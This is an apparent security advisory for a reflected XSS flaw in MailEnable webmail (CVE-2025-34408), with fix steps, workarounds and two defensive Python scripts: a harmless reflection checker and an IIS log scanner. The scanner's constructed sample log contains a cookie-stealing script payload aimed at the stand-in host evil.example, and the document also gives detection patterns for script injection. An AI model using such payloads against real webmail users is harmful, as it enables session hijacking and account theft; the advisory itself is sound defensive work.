CVE-2025-34408

6.1 MEDIUM

📋 TL;DR

MailEnable versions before 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the Added parameter of /Mondo/lang/sys/Forms/MAI/AddRecipientsResult.aspx. An attacker who gets a webmail user to open a crafted link runs JavaScript in that user's browser in the webmail origin, which can expose session cookies that are not HttpOnly, let the script act as the logged-in user, or redirect the user to a phishing page. Every installation running an affected version with the webmail interface reachable by its users is in scope.

💻 Affected Systems

Products:
  • MailEnable
Versions: All versions prior to 10.54
Operating Systems: Windows
Default Config Vulnerable: ⚠️ Yes
Notes: Affects the webmail interface component of MailEnable. Requires the webmail interface to be accessible.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers steal authenticated session cookies, hijack user accounts, redirect to phishing sites, and perform actions as authenticated users including email manipulation.

🟠

Likely Case

Attackers steal non-HttpOnly session cookies to hijack authenticated sessions, potentially accessing email accounts and sensitive data.

🟢

If Mitigated

HttpOnly cookies stop the payload from reading document.cookie, but not the rest of it: the script still runs as the victim and can send requests to the webmail on their behalf. A Content Security Policy that forbids inline script, or HTML-encoding of the Added value on output, is what reduces the impact to limited HTML/CSS injection or temporary page defacement.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ❌ No
Weaponized: Not confirmed (reflected XSS is routinely used in phishing)
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

No public proof-of-concept has been identified, but a reflected XSS needs nothing more than a crafted URL, so building one is straightforward, and such links are routinely delivered through phishing mail. The attacker needs no account; the victim must be a webmail user who opens the link, ideally while logged in.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 10.54

Vendor Advisory: https://mailenable.com/Standard-ReleaseNotes.txt

Restart Required: Yes

Instructions:

1. Download MailEnable version 10.54 or later from the vendor website.
2. Run the installer to upgrade.
3. Restart MailEnable services.
4. Verify the version is 10.54 or higher.

🔧 Temporary Workarounds

Web Application Firewall (WAF) Rules (platform: all)

Block requests to AddRecipientsResult.aspx whose Added parameter contains markup or script characters (<, >, ", javascript:, on...= handlers). Match after URL-decoding, including a second decode for double-encoded payloads, since the payload arrives percent-encoded.

Input Validation Filter (platform: Windows)

The page cannot be patched locally, so apply the filter in front of it: on the IIS site that serves the webmail, reject requests whose Added parameter contains such characters (IIS Request Filtering or a URL Rewrite rule) before they reach the page.

🧯 If You Can't Patch

  • Send a Content Security Policy from the IIS site that hosts the webmail that disallows inline script (no 'unsafe-inline' in script-src); test it first, since legacy webmail pages commonly rely on inline script and may break.
  • Restrict who can reach the webmail (VPN or source-IP allow list), or block the /Mondo/lang/sys/Forms/MAI/AddRecipientsResult.aspx path at the IIS or reverse-proxy layer; a port-level firewall cannot filter by URL.

🔍 How to Verify

Check if Vulnerable:

Request /Mondo/lang/sys/Forms/MAI/AddRecipientsResult.aspx?Added=<marker> with a harmless, unique marker that contains < and " (for example a random token wrapped in those characters) and inspect the response body. If the marker comes back verbatim rather than HTML-encoded (&lt;, &quot;), the page is vulnerable. Test from a logged-in webmail session if the page redirects anonymous requests to the login form.

Check Version:

Read the version in the MailEnable Administration console, in Programs and Features, or from the file version of the MailEnable executables in the installation directory; anything below 10.54 is affected.

Verify Fix Applied:

After patching, repeat the marker test and confirm the value is HTML-encoded (&lt;script&gt;) or rejected. Also try URL-encoded and double-encoded variants (%3Cscript, %253Cscript), since a filter that only matches a literal <script is bypassable.
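
The reflection check above, as a script. This is an added example, not MailEnable's or the advisory's own code; it assumes only the endpoint path given in this advisory, takes the host (and optionally a session cookie) on the command line, and the two sample responses are constructed to show what a vulnerable and a fixed reply look like.

```python
"""Added example (not MailEnable's code): probe AddRecipientsResult.aspx with a
harmless marker in the Added parameter and classify how it is reflected.

reflection_state() works on any response text, so it can be checked offline
against the constructed samples below; probe() does the live request."""
import html
import secrets
import sys
import urllib.error
import urllib.parse
import urllib.request

# Endpoint path from the advisory; the host is supplied by the caller.
ENDPOINT = "/Mondo/lang/sys/Forms/MAI/AddRecipientsResult.aspx"
TOKEN_PREFIX = "me-xss-"


def make_marker() -> str:
    """A unique token wrapped in '<' and '"', the characters that must be
    HTML-encoded on output. Nothing in it executes; it is only a tripwire."""
    return f'<"{TOKEN_PREFIX}{secrets.token_hex(4)}">'


def reflection_state(body: str, marker: str) -> str:
    """Classify how ``marker`` came back in ``body``.

    'raw'         - marker present verbatim: unescaped reflection, vulnerable
    'neutralized' - the token is there but '<' and '"' were encoded or dropped
    'absent'      - token not reflected at all (login redirect, filter, 4xx/5xx)
    """
    token = marker.strip('<">')
    if marker in body:
        return "raw"
    if token in body:
        return "neutralized"
    return "absent"


def _read_body(resp) -> str:
    charset = resp.headers.get_content_charset() or "utf-8"
    return resp.read().decode(charset, "replace")


def probe(base_url: str, marker: str, cookie=None, timeout: float = 10.0) -> str:
    """Live check: GET the endpoint with Added=<marker> and classify the body.
    Pass the webmail session cookie if the page redirects anonymous requests
    to the login form. Error responses are read too, so a 4xx/5xx page that
    still echoes the marker is classified rather than lost."""
    url = (base_url.rstrip("/") + ENDPOINT + "?"
           + urllib.parse.urlencode({"Added": marker}))
    headers = {"User-Agent": "cve-2025-34408-check"}
    if cookie:
        headers["Cookie"] = cookie
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = _read_body(resp)
    except urllib.error.HTTPError as err:
        body = _read_body(err)  # HTTPError exposes the error page the same way
    return reflection_state(body, marker)


# Constructed responses (not captured from a real server) for the two outcomes.
MARKER_SAMPLE = '<"me-xss-abcd1234">'
SAMPLE_VULNERABLE = '<p>Added: <"me-xss-abcd1234"></p>'
SAMPLE_FIXED = '<p>Added: ' + html.escape(MARKER_SAMPLE, quote=True) + '</p>'


if __name__ == "__main__":
    if len(sys.argv) >= 2:
        session_cookie = sys.argv[2] if len(sys.argv) > 2 else None
        print(probe(sys.argv[1], make_marker(), cookie=session_cookie))
    else:
        print("vulnerable sample:", reflection_state(SAMPLE_VULNERABLE, MARKER_SAMPLE))
        print("fixed sample:     ", reflection_state(SAMPLE_FIXED, MARKER_SAMPLE))
```

Run it as `python check.py https://mail.example.com` (add the session cookie string as a second argument if the page bounces anonymous requests to the login form). "raw" means the page is vulnerable; "neutralized" means the characters were encoded or stripped; "absent" needs a manual look, since it usually means the request never reached the page.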

📡 Detection & Monitoring

Log Indicators:

  • HTTP GET requests to AddRecipientsResult.aspx whose Added parameter contains script tags, event-handler attributes (onerror=, onload=) or javascript: URIs, in plain or percent-encoded form (%3Cscript, %253Cscript). The request is issued by the victim's browser, so the client IP belongs to a legitimate user; the Referer, when present, can point at the phishing page that carried the link.

Network Indicators:

  • Requests to the endpoint with unusually long or heavily percent-encoded query strings, or arriving with an external Referer. The webmail runs on IIS, so the site's W3C log (cs-uri-stem, cs-uri-query, cs(Referer), c-ip) is where these show up.

SIEM Query:

source="mailenable.log" AND uri="/Mondo/lang/sys/Forms/MAI/AddRecipientsResult.aspx" AND (query="*Added=*<script*" OR query="*Added=*%3Cscript*" OR query="*Added=*javascript:*")

The source name is a placeholder for the IIS W3C log of the webmail site; map uri and query to cs-uri-stem and cs-uri-query in your SIEM. Matching the encoded form is required because browsers send the payload percent-encoded; a literal <script match alone will miss real attacks.
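
The log indicators above, turned into a scanner over IIS W3C log lines. This is an added example, not the advisory's or MailEnable's own tooling; it assumes the webmail site's IIS log uses the W3C format with a #Fields: directive (the column order is read from that line, so the default field set is not required), and the log lines embedded in it are constructed for illustration, not captured traffic. It goes beyond the SIEM query's literal match by percent-decoding repeatedly (double encoding included) and by catching event-handler and javascript: payloads.

```python
"""Added example (not from the advisory or MailEnable): find requests to
AddRecipientsResult.aspx whose Added parameter carries an HTML/JS payload,
reading IIS W3C log lines. Decodes percent-encoding repeatedly so that
%3Cscript and the double-encoded %253Cscript are both caught."""
import re
import urllib.parse

# Suffix of the vulnerable page, compared case-insensitively (IIS paths are).
TARGET_SUFFIX = "/forms/mai/addrecipientsresult.aspx"

# Indicators checked on the decoded parameter value.
XSS_PATTERN = re.compile(
    r"<\s*/?\s*(script|svg|img|iframe|object|embed|body|math|details)\b"
    r"|javascript\s*:"
    r"|\bon[a-z]+\s*=",
    re.IGNORECASE,
)
MAX_DECODES = 3  # bound the loop; one pass per encoding layer


def fully_decode(value: str) -> str:
    """Percent-decode until the value stops changing (bounded)."""
    for _ in range(MAX_DECODES):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_w3c(lines):
    """Yield one dict per request line, using the #Fields: directive so the
    column order does not have to be hard-coded."""
    fields = None
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # malformed line: skip rather than misalign columns
        yield dict(zip(fields, parts))


def find_hits(lines):
    """Return a list of suspicious requests, one dict per hit, with the
    fields an analyst needs for triage (victim IP, user, Referer, status)."""
    hits = []
    for row in parse_w3c(lines):
        if not row.get("cs-uri-stem", "").lower().endswith(TARGET_SUFFIX):
            continue
        query = row.get("cs-uri-query", "-")
        if query == "-":  # IIS writes '-' when there is no query string
            continue
        # parse_qs decodes one layer; fully_decode handles anything nested
        for name, values in urllib.parse.parse_qs(query, keep_blank_values=True).items():
            if name.lower() != "added":
                continue
            for value in values:
                decoded = fully_decode(value)
                match = XSS_PATTERN.search(decoded)
                if match:
                    hits.append({
                        "time": f"{row.get('date')} {row.get('time')}",
                        "client": row.get("c-ip"),
                        "user": row.get("cs-username"),
                        "referer": row.get("cs(Referer)"),
                        "status": row.get("sc-status"),
                        "indicator": match.group(0),
                        "payload": decoded[:120],
                    })
    return hits


# Constructed log excerpt in the default IIS W3C layout (not real traffic).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-06-01 08:00:01 10.0.0.5 GET /Mondo/lang/sys/Forms/MAI/AddRecipientsResult.aspx Added=alice%40example.com 443 alice 198.51.100.7 Mozilla/5.0 https://mail.example.com/Mondo/ 200 0 0 31
2025-06-01 08:02:14 10.0.0.5 GET /Mondo/lang/sys/Forms/MAI/AddRecipientsResult.aspx Added=%3Cscript%3Elocation%3D%27https%3A%2F%2Fevil.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E 443 bob 203.0.113.9 Mozilla/5.0 https://phish.example/ 200 0 0 28
2025-06-01 08:03:40 10.0.0.5 GET /Mondo/lang/sys/Forms/MAI/AddRecipientsResult.aspx added=%253CSvG%2520OnLoad%253Dalert(1)%253E 443 - 203.0.113.9 curl/8.0 - 200 0 0 12
2025-06-01 08:04:02 10.0.0.5 GET /Mondo/Default.aspx q=%3Cscript%3E 443 - 203.0.113.9 curl/8.0 - 404 0 0 5
"""

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG.splitlines()):
        print(hit)
```

On the sample it flags the two injected requests (the cookie-stealing script with the external Referer, and the double-encoded SVG handler) and ignores the legitimate address and the request to a different page. Triage the hits by Referer and client IP: in a real campaign the client is a victim, not the attacker, and the Referer is the more useful lead.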
